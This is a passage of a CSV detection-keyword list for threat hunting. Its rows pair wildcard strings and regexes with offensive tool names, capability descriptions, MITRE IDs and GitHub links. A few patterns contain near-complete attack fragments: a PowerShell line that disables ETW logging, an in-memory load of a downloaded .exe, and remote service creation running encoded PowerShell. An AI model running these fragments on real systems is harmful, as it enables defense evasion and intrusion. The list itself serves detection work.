to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[i] Argument Spoofed.*",".{0,1000}\[i\]\sArgument\sSpoofed\..{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. 
It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","0","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*[i] Checking for insecure trustee/resource delegations*",".{0,1000}\[i\]\sChecking\sfor\sinsecure\strustee\/resource\sdelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[i] Credman:*Credential Blob Decrypted*",".{0,1000}\[i\]\sCredman\:.{0,1000}Credential\sBlob\sDecrypted.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*[i] Dumping LSASS Using comsvcs.dll*",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\scomsvcs\.dll.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[i] Dumping LSASS Using ProcDump*",".{0,1000}\[i\]\sDumping\sLSASS\sUsing\sProcDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[i] Hooked Ntdll Base Address : *",".{0,1000}\[i\]\sHooked\sNtdll\sBase\sAddress\s\:\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[i] Running ADeleg and creating *",".{0,1000}\[i\]\sRunning\sADeleg\sand\screating\s.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[i] 
Sending Encrypted SAM Save*",".{0,1000}\[i\]\sSending\sEncrypted\sSAM\sSave.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[i] Unhooked Ntdll Base Address: *",".{0,1000}\[i\]\sUnhooked\sNtdll\sBase\sAddress\:\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*[LOLSpoof] > *",".{0,1000}\[LOLSpoof\]\s\>\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*[PEzor] cleanup complete*",".{0,1000}\[PEzor\]\scleanup\scomplete.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*[PEzor] payload freed*",".{0,1000}\[PEzor\]\spayload\sfreed.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*[PEzor] starting BOF*",".{0,1000}\[PEzor\]\sstarting\sBOF.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - 
T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*[Reflection.Assembly]::Load(*[Char](*)+[Char](*)+*+[Char](*)*",".{0,1000}\[Reflection\.Assembly\]\:\:Load\(.{0,1000}\[Char\]\(.{0,1000}\)\+\[Char\]\(.{0,1000}\)\+.{0,1000}\+\[Char\]\(.{0,1000}\).{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","powershell scriptblock","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*",".{0,1000}\[Reflection\.Assembly\]\:\:LoadWithPartialName\(\'System\.Core\'\)\.GetType\(\'System\.Diagnostics\.Eventing\.EventProvider\'\)\.GetField\(\'m_enabled\'.{0,1000}\'NonPublic.{0,1000}Instance\'\)\.SetValue\(\[Ref\]\.Assembly\.GetType\(\'System\.Management\.Automation\.Tracing\.PSEtwLogProvider\'\)\.GetField\(\'etwProvider\'.{0,1000}\'NonPublic.{0,1000}Static\'\)\.GetValue\(\$null\).{0,1000}0\).{0,1000}","offensive_tool_keyword","powershell","impair the defenses of the targeted system by disabling ETW logging for PowerShell. 
This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected","T1562","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*['spawnto']*",".{0,1000}\[\'spawnto\'\].{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*[START]: Password spraying attack!*",".{0,1000}\[START\]\:\sPassword\sspraying\sattack!.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 
- T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*[string]$Class = ""PMEClass""*",".{0,1000}\[string\]\$Class\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*[System.Reflection.Assembly]::Load((Invoke-WebRequest *.exe*while ($true){Start-Sleep -s 1000}*",".{0,1000}\[System\.Reflection\.Assembly\]\:\:Load\(\(Invoke\-WebRequest\s.{0,1000}\.exe.{0,1000}while\s\(\$true\)\{Start\-Sleep\s\-s\s1000\}.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*[warn] You either fat fingered this or something else. 
Either way*",".{0,1000}\[warn\]\sYou\seither\sfat\sfingered\sthis\sor\ssomething\selse\.\sEither\sway.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*[x] Cannot load NTDLL.DLL*",".{0,1000}\[x\]\sCannot\sload\sNTDLL\.DLL.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*[x] Failed to locate the ngentask.exe binary in the WinSxS directory*",".{0,1000}\[x\]\sFailed\sto\slocate\sthe\sngentask\.exe\sbinary\sin\sthe\sWinSxS\sdirectory.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*[X] Your harvest exploded:*",".{0,1000}\[X\]\sYour\sharvest\sexploded\:.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\ rev_shell.py*",".{0,1000}\\\srev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - 
T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*\""-SecureString\"" OR \""-AsPlainText\"" OR \""Net.NetworkCredential\""*",".{0,1000}\\\""\-SecureString\\\""\sOR\s\\\""\-AsPlainText\\\""\sOR\s\\\""Net\.NetworkCredential\\\"".{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\$*.kirbi*",".{0,1000}\\\$.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\(s)AINT\Cam*",".{0,1000}\\\(s\)AINT\\Cam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\(s)AINT\Logs*",".{0,1000}\\\(s\)AINT\\Logs.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - 
T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\(s)AINT\saint.jar*",".{0,1000}\\\(s\)AINT\\saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\(s)AINT\Screenshot*",".{0,1000}\\\(s\)AINT\\Screenshot.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\*.O365.GroupMembership_AdminGroups.txt*",".{0,1000}\\.{0,1000}\.O365\.GroupMembership_AdminGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*\*.O365.GroupMembership_VPNGroups.txt*",".{0,1000}\\.{0,1000}\.O365\.GroupMembership_VPNGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" 
"*\*.O365.Roles_Admins.txt*",".{0,1000}\\.{0,1000}\.O365\.Roles_Admins\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*\.clone.dll*",".{0,1000}\\\.clone\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\.eKeys-Parsed.txt*",".{0,1000}\\\.eKeys\-Parsed\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\:MLKH*",".{0,1000}\\\:MLKH.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed HKLM:\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\$ComputerName delete $ServiceName*",".{0,1000}\\\\\$ComputerName\sdelete\s\$ServiceName.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\\* create Service_* binpath= `""C:\Windows\System32\cmd.exe /c powershell.exe -enc *",".{0,1000}\\\\.{0,1000}\screate\sService_.{0,1000}\sbinpath\=\s\`\""C\:\\Windows\\System32\\cmd\.exe\s\/c\spowershell\.exe\s\-enc\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\\.\\pipe\\blindspot-*",".{0,1000}\\\\\.\\\\pipe\\\\blindspot\-.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\\.\\pipe\\kangaroo*",".{0,1000}\\\\\.\\\\pipe\\\\kangaroo.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","pipename","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\\.\\pipe\\keylogger*",".{0,1000}\\\\\.\\\\pipe\\\\keylogger.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind 
spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\\.\\pipe\\lsarelayx*",".{0,1000}\\\\\.\\\\pipe\\\\lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\\.\\pipe\\netview*",".{0,1000}\\\\\.\\\\pipe\\\\netview.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\\.\\pipe\\portscan*",".{0,1000}\\\\\.\\\\pipe\\\\portscan.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\\.\\pipe\\Teste*",".{0,1000}\\\\\.\\\\pipe\\\\Teste.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\\.\Nidhogg*",".{0,1000}\\\\\.\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red 
teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\\.\pipe\coerced\pipe\spoolss*",".{0,1000}\\\\\.\\pipe\\coerced\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*\\.\pipe\Merlin*",".{0,1000}\\\\\.\\pipe\\Merlin.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\\.\pipe\merlin*",".{0,1000}\\\\\.\\pipe\\merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 
- TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","named pipe","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\\.\pipe\mimi*",".{0,1000}\\\\\.\\pipe\\mimi.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*\\.\pipe\pwned/pipe/srvsvc*",".{0,1000}\\\\\.\\pipe\\pwned\/pipe\/srvsvc.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","pipename","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*\\.\pipe\test\pipe\spoolss *",".{0,1000}\\\\\.\\pipe\\test\\pipe\\spoolss\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\\.\pipe\win-sux-no-async-anon-pipe-*-*",".{0,1000}\\\\\.\\pipe\\win\-sux\-no\-async\-anon\-pipe\-.{0,1000}\-.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*\\:C*",".{0,1000}\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed c:\\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense 
Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\??\\Jormungandr*",".{0,1000}\\\\\?\?\\\\Jormungandr.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","0","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*\\??\\Nidhogg*",".{0,1000}\\\\\?\?\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - 